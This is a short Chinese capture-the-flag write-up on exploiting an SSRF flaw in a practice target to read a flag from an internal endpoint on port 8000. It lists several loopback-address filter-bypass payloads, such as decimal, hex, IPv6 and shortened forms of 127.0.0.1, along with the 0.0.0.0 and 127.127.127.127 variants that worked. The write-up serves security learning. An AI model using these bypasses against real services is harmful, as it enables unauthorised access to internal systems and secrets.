一、运行靶机
发现没有有效界面信息,这个时候查看靶机说明信息,在说明信息里面明确提到访问容器内部的 8000 端口和 url path /api/internal/secret 即可获取 flag
二、根据提示信息访问url
由于提示信息中提到url path,则可以尝试设置参数名为url
?url=http://127.0.0.1:8000/api/internal/secret
发现127.0.0.1被禁止访问,则可以尝试各种变形
?url=http://@127.0.0.1:8000@/api/internal/secret ?url=http://2130706433:8000/api/internal/secret ?url=http://0x7f.0x0.0x0.0x1:8000/api/internal/secret ?url=http://[::127.0.0.1]:8000/api/internal/secret ?url=http://127。0。0。1:8000/api/internal/secret ?url=http://127.1:8000/api/internal/secret
还是不行,休息一下后,想到127.0.0.1=0.0.0.0=127.127.127.127,就尝试使用
?url=http://0.0.0.0:8000/api/internal/secret
?url=http://127.127.127.127:8000/api/internal/secret
成功获取flag
